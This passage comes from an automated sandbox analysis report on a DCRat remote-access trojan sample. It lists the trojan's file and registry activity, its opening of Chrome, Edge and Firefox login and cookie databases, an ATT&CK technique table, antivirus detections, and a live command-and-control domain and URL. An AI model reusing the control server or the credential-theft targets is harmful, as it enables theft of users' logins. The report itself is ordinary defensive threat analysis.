                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                                    Source: C:\Windows\System32\cmd.exe; Queries volume information: C:\ VolumeInformation
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe; Queries volume information: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe VolumeInformation
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; Queries volume information: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exe; Code function: 0_2_008BDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_008BDF1E
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exe; Code function: 0_2_008AB146 GetVersionExW,0_2_008AB146
                                    Source: C:\Windows\SysWOW64\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                    Stealing of Sensitive Information

                                    Source: Yara match; File source: 00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match; File source: 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match; File source: 00000005.00000002.1924266865.000000001306B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match; File source: Process Memory Space: bridgeportDhcpcommon.exe PID: 6288, type: MEMORYSTR
                                    Source: Yara match; File source: Process Memory Space: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe PID: 180, type: MEMORYSTR
                                    Source: Yara match; File source: Process Memory Space: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe PID: 6232, type: MEMORYSTR
                                    Source: Yara match; File source: 544WP3NHaP.exe, type: SAMPLE
                                    Source: Yara match; File source: 5.0.bridgeportDhcpcommon.exe.a10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match; File source: 0.3.544WP3NHaP.exe.62f96e5.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match; File source: 0.3.544WP3NHaP.exe.6c096e5.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match; File source: 0.3.544WP3NHaP.exe.62f96e5.0.unpack, type: UNPACKEDPE
                                    Source: Yara match; File source: 0.3.544WP3NHaP.exe.6c096e5.1.unpack, type: UNPACKEDPE
                                    Source: Yara match; File source: 00000005.00000000.1870378712.0000000000A12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match; File source: 00000000.00000003.1651965789.00000000062AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match; File source: 00000000.00000003.1652451917.0000000006BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match; File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, type: DROPPED
                                    Source: Yara match; File source: C:\Recovery\SearchApp.exe, type: DROPPED
                                    Source: Yara match; File source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, type: DROPPED
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                    Remote Access Functionality

                                    Source: Yara match; File source: 00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match; File source: 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match; File source: 00000005.00000002.1924266865.000000001306B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match; File source: Process Memory Space: bridgeportDhcpcommon.exe PID: 6288, type: MEMORYSTR
                                    Source: Yara match; File source: Process Memory Space: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe PID: 180, type: MEMORYSTR
                                    Source: Yara match; File source: Process Memory Space: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe PID: 6232, type: MEMORYSTR
                                    Source: Yara match; File source: 544WP3NHaP.exe, type: SAMPLE
                                    Source: Yara match; File source: 5.0.bridgeportDhcpcommon.exe.a10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match; File source: 0.3.544WP3NHaP.exe.62f96e5.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match; File source: 0.3.544WP3NHaP.exe.6c096e5.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match; File source: 0.3.544WP3NHaP.exe.62f96e5.0.unpack, type: UNPACKEDPE
                                    Source: Yara match; File source: 0.3.544WP3NHaP.exe.6c096e5.1.unpack, type: UNPACKEDPE
                                    Source: Yara match; File source: 00000005.00000000.1870378712.0000000000A12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match; File source: 00000000.00000003.1651965789.00000000062AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match; File source: 00000000.00000003.1652451917.0000000006BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match; File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, type: DROPPED
                                    Source: Yara match; File source: C:\Recovery\SearchApp.exe, type: DROPPED
                                    Source: Yara match; File source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, type: DROPPED
                                    | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                                    |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                                    | Gather Victim Identity Information | 11 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | 1 Taint Shared Content | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                                    | Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
                                    | Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | Security Account Manager | 137 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                                    | Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | 31 Registry Run Keys / Startup Folder | 31 Registry Run Keys / Startup Folder | 3 Software Packing | NTDS | 221 Security Software Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
                                    | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                                    | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 131 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                                    | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 133 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                                    | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 131 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                                    | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                                    [Behavior graph: ID 1583089, Sample: 544WP3NHaP.exe, Startdate: 01/01/2025, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label
544WP3NHaP.exe | 56% | Virustotal |
544WP3NHaP.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
544WP3NHaP.exe | 100% | Avira | VBS/Runner.VPG
544WP3NHaP.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Recovery\SearchApp.exe | 100% | Avira | HEUR/AGEN.1323342
C:\bridgemssurrogateintonet\QHbd8WvF.vbe | 100% | Avira | VBS/Runner.VPG
C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\Desktop\LsbmIiGn.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Users\user\Desktop\KSdeeKAW.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\Desktop\AjJOuhvp.log | 100% | Avira | TR/AVI.Agent.updqb
C:\Users\user\Desktop\BJIWYGBF.log | 100% | Avira | TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\xNnAMDzXoE.bat | 100% | Avira | BAT/Delbat.C
C:\Recovery\SearchApp.exe | 100% | Joe Sandbox ML |
C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\LsbmIiGn.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\KSdeeKAW.log | 100% | Joe Sandbox ML |
C:\Windows\System32\SecurityHealthSystray.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\atZTrSKs.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\sgzhoMlY.log | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Recovery\SearchApp.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AjJOuhvp.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BJIWYGBF.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\KSdeeKAW.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\LsbmIiGn.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\atZTrSKs.log | 8% | ReversingLabs |
C:\Users\user\Desktop\mEBzyVHW.log | 25% | ReversingLabs |
C:\Users\user\Desktop\qeNySdhc.log | 25% | ReversingLabs |
C:\Users\user\Desktop\sgzhoMlY.log | 8% | ReversingLabs |
C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                    No Antivirus matches
                                    No Antivirus matches
Source | Detection | Scanner | Label
http://126987cm.renyash.ru/ | 100% | Avira URL Cloud | malware
http://126987cm.renyash.ru/VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php | 100% | Avira URL Cloud | malware
http://126987cm.reP | 0% | Avira URL Cloud | safe
http://126987cm.renyash.ru | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
126987cm.renyash.ru | 172.67.220.198 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://126987cm.renyash.ru/VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.220.198 | 126987cm.renyash.ru | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1583089
Start date and time: 2025-01-01 21:46:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 46
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 544WP3NHaP.exe
renamed because original name is a hash value
Original Sample Name: 50abe040b81818bf7ece156a10dbbbc9.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winEXE@48/46@1/1
EGA Information:
• Successful, ratio: 30%
HCA Information: Failed
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe, SearchApp.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 20.109.210.53, 184.28.90.27, 13.107.246.45
